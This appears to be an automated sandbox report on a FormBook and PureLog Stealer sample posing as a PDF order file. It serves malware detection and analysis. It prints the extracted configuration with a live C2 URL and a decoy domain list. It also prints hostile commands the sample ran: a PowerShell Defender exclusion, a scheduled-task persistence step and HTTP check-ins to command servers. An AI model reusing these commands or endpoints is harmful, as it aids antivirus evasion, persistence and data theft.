7.2.RFQ31072024_August order_pdf.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
7.2.RFQ31072024_August order_pdf.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
10.2.EqtGqZpPskFq.exe.2c24420.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 11 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe", ParentImage: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe, ParentProcessId: 7488, ParentProcessName: RFQ31072024_August order_pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe", ProcessId: 7712, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EqtGqZpPskFq" /XML "C:\Users\user\AppData\Local\Temp\tmpF9FC.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EqtGqZpPskFq" /XML "C:\Users\user\AppData\Local\Temp\tmpF9FC.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe, ParentImage: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe, ParentProcessId: 8076, ParentProcessName: EqtGqZpPskFq.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EqtGqZpPskFq" /XML "C:\Users\user\AppData\Local\Temp\tmpF9FC.tmp", ProcessId: 7192, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EqtGqZpPskFq" /XML "C:\Users\user\AppData\Local\Temp\tmpDEC3.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EqtGqZpPskFq" /XML "C:\Users\user\AppData\Local\Temp\tmpDEC3.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe", ParentImage: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe, ParentProcessId: 7488, ParentProcessName: RFQ31072024_August order_pdf.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EqtGqZpPskFq" /XML "C:\Users\user\AppData\Local\Temp\tmpDEC3.tmp", ProcessId: 7740, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe", ParentImage: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe, ParentProcessId: 7488, ParentProcessName: RFQ31072024_August order_pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe", ProcessId: 7712, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EqtGqZpPskFq" /XML "C:\Users\user\AppData\Local\Temp\tmpDEC3.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EqtGqZpPskFq" /XML "C:\Users\user\AppData\Local\Temp\tmpDEC3.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe", ParentImage: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe, ParentProcessId: 7488, ParentProcessName: RFQ31072024_August order_pdf.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EqtGqZpPskFq" /XML "C:\Users\user\AppData\Local\Temp\tmpDEC3.tmp", ProcessId: 7740, ProcessName: schtasks.exe

Snort Signatures

⊘No Snort rule has matched

Suricata Signatures

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.8 - Destination IP: 154.84.24.46

Timestamp:	2024-07-31T09:54:50.373491+0200
SID:	2031453
Source Port:	51045
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.8 - Destination IP: 103.224.212.212

Timestamp:	2024-07-31T09:52:03.303852+0200
SID:	2031453
Source Port:	51039
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.8 - Destination IP: 84.32.84.32

Timestamp:	2024-07-31T09:53:25.022939+0200
SID:	2031453
Source Port:	51041
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.8 - Destination IP: 172.247.168.134

Timestamp:	2024-07-31T09:54:26.541967+0200
SID:	2031453
Source Port:	51044
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.8 - Destination IP: 43.129.208.111

Timestamp:	2024-07-31T09:54:26.704467+0200
SID:	2031453
Source Port:	51043
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.8 - Destination IP: 3.33.130.190

Timestamp:	2024-07-31T09:50:35.703773+0200
SID:	2031453
Source Port:	51042
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.8 - Destination IP: 38.150.29.115

Timestamp:	2024-07-31T09:51:43.452182+0200
SID:	2031453
Source Port:	51038
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.8 - Destination IP: 172.247.228.75

Timestamp:	2024-07-31T09:53:04.637187+0200
SID:	2031453
Source Port:	51040
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0000000B.00000002.3827426798.0000000004A00000.00000040.10000000.00040000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.ygyqpswy.xyz/ss24/"], "decoy": ["agingwellhc.com", "unikbetanggur.autos", "eb2024yl.top", "ja380.xyz", "thehalcyon.studio", "maudsoogrim.com", "esteler10.click", "mewtcp.xyz", "www-zjbf1.club", "kucinglucu.online", "lunwencheck.com", "65597.photos", "erbxeu358h.top", "startable.online", "yousend.xyz", "csharksg.com", "centricoatings.com", "ntruhslearn.xyz", "achabakra.xyz", "zuntool.com", "jejbtl738a.top", "runebinder.com", "fidogmesvies170s63.online", "online-unicsedritcorp.com", "8208975.com", "supporthq.life", "protocolozeroacne.com", "ocotilloco.com", "xcolbu456t.xyz", "ciclidossi.com", "163875.shop", "strangebedfellowstheatre.com", "unikbetjeruk.homes", "jhlktwyq.xyz", "realearthpower.com", "crucka.xyz", "pkvnvtdb.com", "profitablecasino.com", "uspspsnami.top", "thejerkspices.com", "sivagiriashram.info", "usavisa8loan.xyz", "deoconverter.pro", "investing-courses-66663.bond", "2025tengxun171.lat", "bluebirdbodyworkstudio.com", "siblingstalk.com", "lxcqx.com", "amharicprofessional.pro", "lijiangstory.net", "barflybook.com", "eldesigin.com", "yd81w.top", "head2toe.boutique", "varun.works", "next-genlion.com", "awvd97.com", "derindenizotel.com", "vertibridge.xyz", "qdfake609am.xyz", "acc-pay.top", "qblackbit.com", "pallesudatissime.com", "8548d.com"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe

ReversingLabs: Detection: 28%

Multi AV Scanner detection for submitted file

Source: RFQ31072024_August order_pdf.exe	ReversingLabs: Detection: 28%
Source: RFQ31072024_August order_pdf.exe	Virustotal: Detection: 37%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 7.2.RFQ31072024_August order_pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RFQ31072024_August order_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.3827426798.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3827516855.0000000004A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1488235517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.1533795210.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3825026550.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1426588341.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: RFQ31072024_August order_pdf.exe

Joe Sandbox ML: detected

Source: RFQ31072024_August order_pdf.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: RFQ31072024_August order_pdf.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: msiexec.pdb source: RFQ31072024_August order_pdf.exe, 00000007.00000002.1488970281.0000000001148000.00000004.00000020.00020000.00000000.sdmp, RFQ31072024_August order_pdf.exe, 00000007.00000002.1488970281.000000000115F000.00000004.00000020.00020000.00000000.sdmp, RFQ31072024_August order_pdf.exe, 00000007.00000002.1490043213.0000000001560000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, msiexec.exe, 0000000B.00000002.3822685134.00000000003F0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: systray.pdb source: EqtGqZpPskFq.exe, 00000010.00000002.1530936851.0000000001467000.00000004.00000020.00020000.00000000.sdmp, EqtGqZpPskFq.exe, 00000010.00000002.1530851810.00000000013B0000.00000040.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.1533557411.0000000000AE0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: msiexec.pdbGCTL source: RFQ31072024_August order_pdf.exe, 00000007.00000002.1488970281.0000000001148000.00000004.00000020.00020000.00000000.sdmp, RFQ31072024_August order_pdf.exe, 00000007.00000002.1488970281.000000000115F000.00000004.00000020.00020000.00000000.sdmp, RFQ31072024_August order_pdf.exe, 00000007.00000002.1490043213.0000000001560000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3822685134.00000000003F0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: systray.pdbGCTL source: EqtGqZpPskFq.exe, 00000010.00000002.1530936851.0000000001467000.00000004.00000020.00020000.00000000.sdmp, EqtGqZpPskFq.exe, 00000010.00000002.1530851810.00000000013B0000.00000040.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.1533557411.0000000000AE0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: RFQ31072024_August order_pdf.exe, 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3828642531.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.1489881445.0000000004853000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.1492894327.0000000004A00000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3828642531.0000000004D4E000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000013.00000002.1534062684.0000000004F10000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000013.00000002.1534062684.00000000050AE000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000013.00000003.1532526422.0000000004D67000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000013.00000003.1531020029.0000000004BB6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: RFQ31072024_August order_pdf.exe, RFQ31072024_August order_pdf.exe, 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, msiexec.exe, 0000000B.00000002.3828642531.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.1489881445.0000000004853000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.1492894327.0000000004A00000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3828642531.0000000004D4E000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000013.00000002.1534062684.0000000004F10000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000013.00000002.1534062684.00000000050AE000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000013.00000003.1532526422.0000000004D67000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000013.00000003.1531020029.0000000004BB6000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 4x nop then pop esi	7_2_00417306
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 4x nop then pop edi	7_2_0040E471
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 4x nop then pop edi	7_2_00416CDC
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 4x nop then pop edi	7_2_00417D98
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then pop esi	11_2_02D07306
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then pop edi	11_2_02CFE471
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then pop edi	11_2_02D06CDC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then pop edi	11_2_02D07D98

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe

Network Connect: 38.150.29.115 80

Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.ygyqpswy.xyz/ss24/

Performs DNS queries to domains with low reputation

Source:	DNS query: www.qdfake609am.xyz
Source:	DNS query: www.ygyqpswy.xyz

Source: global traffic	HTTP traffic detected: GET /ss24/?Vt=YE/ZdGmKW74FtAWOlvaRGVRfbsx7fOwtd0JkYjwj0oStavEyCEbfL8DERV6p5jCnNdOA&Rxl=8pdPF640TxI0Gb HTTP/1.1Host: www.qdfake609am.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ss24/?Vt=zMEVcHBGt47G6KX5esEX8dtG6+lnOeOio8+YHkIF/aeZvdpFgNK9qxVPP7cqFgvwi0y6&Rxl=8pdPF640TxI0Gb HTTP/1.1Host: www.startable.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ss24/?Vt=AizMimZChlrhQFmDW8mDt8YQ1AEx0YD6XMUBGPJfRJKPSKhlu7m+Wdy74pBw1CXQgid8&Rxl=8pdPF640TxI0Gb HTTP/1.1Host: www.8548d.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ss24/?Vt=Sz2HgEYBPSNrFgEG5TBHr9umjqKYoRRoJMI98zFy0lYC0jiER84YqalYGbnnf7fj4Pfa&Rxl=8pdPF640TxI0Gb HTTP/1.1Host: www.kucinglucu.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View	IP Address: 103.224.212.212 103.224.212.212
Source: Joe Sandbox View	IP Address: 84.32.84.32 84.32.84.32

Source: Joe Sandbox View	ASN Name: COGENT-174US COGENT-174US
Source: Joe Sandbox View	ASN Name: NTT-LT-ASLT NTT-LT-ASLT

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\explorer.exe

Code function: 8_2_1004BF82 getaddrinfo,setsockopt,recv,

8_2_1004BF82

Source: global traffic	HTTP traffic detected: GET /ss24/?Vt=YE/ZdGmKW74FtAWOlvaRGVRfbsx7fOwtd0JkYjwj0oStavEyCEbfL8DERV6p5jCnNdOA&Rxl=8pdPF640TxI0Gb HTTP/1.1Host: www.qdfake609am.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ss24/?Vt=zMEVcHBGt47G6KX5esEX8dtG6+lnOeOio8+YHkIF/aeZvdpFgNK9qxVPP7cqFgvwi0y6&Rxl=8pdPF640TxI0Gb HTTP/1.1Host: www.startable.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ss24/?Vt=AizMimZChlrhQFmDW8mDt8YQ1AEx0YD6XMUBGPJfRJKPSKhlu7m+Wdy74pBw1CXQgid8&Rxl=8pdPF640TxI0Gb HTTP/1.1Host: www.8548d.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ss24/?Vt=Sz2HgEYBPSNrFgEG5TBHr9umjqKYoRRoJMI98zFy0lYC0jiER84YqalYGbnnf7fj4Pfa&Rxl=8pdPF640TxI0Gb HTTP/1.1Host: www.kucinglucu.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: global traffic	DNS traffic detected: DNS query: www.qdfake609am.xyz
Source: global traffic	DNS traffic detected: DNS query: www.startable.online
Source: global traffic	DNS traffic detected: DNS query: www.ygyqpswy.xyz
Source: global traffic	DNS traffic detected: DNS query: www.163875.shop
Source: global traffic	DNS traffic detected: DNS query: www.8548d.com
Source: global traffic	DNS traffic detected: DNS query: www.kucinglucu.online
Source: global traffic	DNS traffic detected: DNS query: www.thehalcyon.studio
Source: global traffic	DNS traffic detected: DNS query: www.2025tengxun171.lat
Source: global traffic	DNS traffic detected: DNS query: www.8208975.com
Source: global traffic	DNS traffic detected: DNS query: www.65597.photos
Source: global traffic	DNS traffic detected: DNS query: www.realearthpower.com

Source: explorer.exe, 00000008.00000002.3845642332.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1434261414.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1434261414.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082201534.0000000009255000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000008.00000002.3851391138.0000000010A2B000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3827151004.00000000049FB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3838560992.00000000051DB000.00000004.10000000.00040000.00000000.sdmp, RFQ31072024_August order_pdf.exe, EqtGqZpPskFq.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: explorer.exe, 00000008.00000002.3851391138.0000000010A2B000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3827151004.00000000049FB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3838560992.00000000051DB000.00000004.10000000.00040000.00000000.sdmp, RFQ31072024_August order_pdf.exe, EqtGqZpPskFq.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: explorer.exe, 00000008.00000002.3845642332.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1434261414.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1434261414.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082201534.0000000009255000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000008.00000002.3845642332.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082201534.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1434261414.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3845642332.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1434261414.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1434261414.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082201534.0000000009255000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000008.00000000.1427252265.0000000004405000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3842148141.0000000004405000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ns.adobeS
Source: explorer.exe, 00000008.00000002.3851391138.0000000010A2B000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3827151004.00000000049FB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.3838560992.00000000051DB000.00000004.10000000.00040000.00000000.sdmp, RFQ31072024_August order_pdf.exe, EqtGqZpPskFq.exe.0.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: explorer.exe, 00000008.00000002.3845642332.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1434261414.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1434261414.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082201534.0000000009255000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000008.00000002.3845273913.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1434261414.00000000090DA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000008.00000002.3844169156.0000000007720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000002.3831482856.0000000002C80000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.1431488156.0000000007710000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: RFQ31072024_August order_pdf.exe, 00000000.00000002.1425810196.000000000254D000.00000004.00000800.00020000.00000000.sdmp, EqtGqZpPskFq.exe, 0000000A.00000002.1502952456.0000000002C5D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.163875.shop
Source: explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.163875.shop/ss24/
Source: explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.163875.shop/ss24/www.8548d.com
Source: explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.163875.shopReferer:
Source: explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.2025tengxun171.lat
